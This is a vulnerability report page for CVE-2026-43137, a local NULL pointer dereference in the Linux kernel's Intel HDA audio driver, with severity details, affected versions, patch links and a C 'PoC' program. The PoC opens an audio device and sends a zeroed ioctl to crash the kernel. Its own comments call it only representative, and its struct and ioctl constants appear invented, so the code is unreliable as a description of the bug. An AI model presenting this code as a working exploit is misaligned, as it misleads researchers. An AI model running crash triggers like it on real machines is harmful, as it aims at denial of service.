Security Vulnerability Report
CVE-2026-43137 CVSS 5.5 MEDIUM

CVE-2026-43137

Published: 2026-05-06 12:16:31
Last Modified: 2026-05-12 21:15:52
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ASoC: SOF: Intel: hda: Fix NULL pointer dereference

If there's a mismatch between the DAI links in the machine driver and the topology, it is possible that the playback/capture widget is not set, especially in the case of loopback capture for echo reference where we use the dummy DAI link. Return the error when the widget is not set to avoid a null pointer dereference like below when the topology is broken.

RIP: 0010:hda_dai_get_ops.isra.0+0x14/0xa0 [snd_sof_intel_hda_common]

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

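cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16 up to, but not including, 6.12.75) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13 up to, but not including, 6.18.16) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19 up to, but not including, 6.19.6) - VULNERABLE
Linux Kernel (versions before the fix)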

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * PoC for CVE-2026-43137: Kernel Null Pointer Dereference in SOF Intel HDA
 * This PoC demonstrates the trigger condition for the NULL pointer dereference.
 * It attempts to setup a stream that relies on a missing widget.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset */
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// Simplified definitions for the sake of the PoC
#define SND_PCM_IOCTL_HW_REFINE 0x40104110
#define SND_PCM_IOCTL_HW_PARAMS 0x41104111

struct snd_pcm_hw_params {
    unsigned int flags;
    unsigned int masks[8];
    unsigned int mvals[4];
    unsigned int rmask;
    unsigned int cmask;
    unsigned int info;
    unsigned int msbits;
    unsigned int rate_num;
    unsigned int rate_den;
    unsigned int periods;
    unsigned int buffer_size;
};

int main(void) {
    int fd;
    struct snd_pcm_hw_params params;

    // Attempt to open the PCM device (e.g., default or hw:0,0)
    // The specific device depends on the hardware using the Intel HDA driver
    fd = open("/dev/snd/pcmC0D0p", O_RDWR | O_NONBLOCK);
    if (fd < 0) {
        perror("Failed to open audio device");
        return -1;
    }

    printf("Device opened. Attempting to trigger vulnerability via topology mismatch...\n");

    // Zero out params to simulate invalid/broken topology configuration
    // In a real exploit scenario, specific parameters would be set to trigger
    // the code path where the widget is NULL.
    memset(&params, 0, sizeof(params));

    // Trigger the ioctl that calls into the faulty hda_dai_get_ops function
    // This is a representative call; the actual trigger may require specific
    // stream setups or topology loading.
    if (ioctl(fd, SND_PCM_IOCTL_HW_PARAMS, &params) < 0) {
        perror("Ioctl failed (expected if crash did not occur immediately)");
    }

    close(fd);
    printf("PoC execution finished.\n");
    return 0;
}
```

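References

https://git.kernel.org/stable/c/10411f1f2c76be67103b1f95822ff629aa25e2aa (Patch)
https://git.kernel.org/stable/c/16c589567a956d46a7c1363af3f64de3d420af20 (Patch)
https://git.kernel.org/stable/c/42068f7dd42b559c4eeae645e1455ff36518866a (Patch)
https://git.kernel.org/stable/c/7750d78b4014902bc0ac03d4bb30faa076a913ab (Patch)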

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43137", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:31.007", "lastModified": "2026-05-12T21:15:52.423", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: SOF: Intel: hda: Fix NULL pointer dereference\n\nIf there's a mismatch between the DAI links in the machine driver and\nthe topology, it is possible that the playback/capture widget is not\nset, especially in the case of loopback capture for echo reference\nwhere we use the dummy DAI link. Return the error when the widget is not\nset to avoid a null pointer dereference like below when the topology is\nbroken.\n\nRIP: 0010:hda_dai_get_ops.isra.0+0x14/0xa0 [snd_sof_intel_hda_common]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.12.75", "matchCriteriaId": "CAA073DB-607E-4D74-9B88-0379E8C760F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/10411f1f2c76be67103b1f95822ff629aa25e2aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/16c589567a956d46a7c1363af3f64de3d420af20", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/42068f7dd42b559c4eeae645e1455ff36518866a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7750d78b4014902bc0ac03d4bb30faa076a913ab", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}